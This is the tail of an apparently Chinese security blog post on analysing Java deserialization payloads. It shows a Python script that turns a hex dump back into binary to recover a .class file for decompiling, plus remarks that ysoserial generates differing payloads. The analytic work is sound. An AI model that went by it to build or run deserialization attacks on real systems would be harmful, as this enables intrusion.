pattern = re.compile(r<span class=hljs-string>'[0-9a-fA-F]{8}'</span>)
|
|||
|
|
<span class=hljs-built_in>return</span> re.sub(pattern, <span class=hljs-string>''</span>, input_string)
|
|||
|
|
|
|||
|
|
def remove_vertical_line(input_string):
|
|||
|
|
pattern = re.compile(r<span class=hljs-string>'\|.*\|'</span>)
|
|||
|
|
<span class=hljs-built_in>return</span> re.sub(pattern, <span class=hljs-string>''</span>, input_string)
|
|||
|
|
|
|||
|
|
def extract_hex_to_file(input_filename, output_filename):
|
|||
|
|
with open(input_filename, <span class=hljs-string>"r"</span>) as file:
|
|||
|
|
input_text = file.read()
|
|||
|
|
|
|||
|
|
input_text = remove_hex_line(input_text)
|
|||
|
|
input_text = remove_vertical_line(input_text)
|
|||
|
|
hex_data = re.findall(r<span class=hljs-string>"[0-9a-fA-F]{2}(?: [0-9a-fA-F]{2})*"</span>, input_text)
|
|||
|
|
hex_string = <span class=hljs-string>""</span>.join(hex_data).replace(<span class=hljs-string>" "</span>, <span class=hljs-string>""</span>)
|
|||
|
|
|
|||
|
|
with open(output_filename, <span class=hljs-string>"wb"</span>) as file:
|
|||
|
|
file.write(bytes.fromhex(hex_string))
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>if</span> __name__ == <span class=hljs-string>"__main__"</span>:
|
|||
|
|
<span class=hljs-keyword>if</span> len(sys.argv) != 3:
|
|||
|
|
<span class=hljs-built_in>print</span>(<span class=hljs-string>"Usage: python3 extract_hex.py input_filename output_filename"</span>)
|
|||
|
|
sys.exit(1)
|
|||
|
|
|
|||
|
|
input_filename = sys.argv[1]
|
|||
|
|
output_filename = sys.argv[2]
|
|||
|
|
|
|||
|
|
extract_hex_to_file(input_filename, output_filename)
|
|||
|
|
</code></pre>
|
|||
|
|
<pre blockindex=60><code class="hljs language-bash">python3 extract_hex.py ser_hex.txt restore.class
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=61>拿到class,然后丢到idea中,自己反编译了</p>
|
|||
|
|
<p blockindex=62><img src="
|
|||
|
|
<h2 blockindex=63>0x05 后言</h2>
|
|||
|
|
<p blockindex=64>在分析的时候,发现 ysoserial 两次生成Payload会不一样的。。。卡了我好一会。。。</p>
|
|||
|
|
<p blockindex=65><img src=
|
|||
|
|
<p blockindex=66>虽然分析没问题,但是步骤略微繁琐,后续有空,可以考虑整合成一个工具,自动解码。</p>
|
|||
|
|
</div></div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|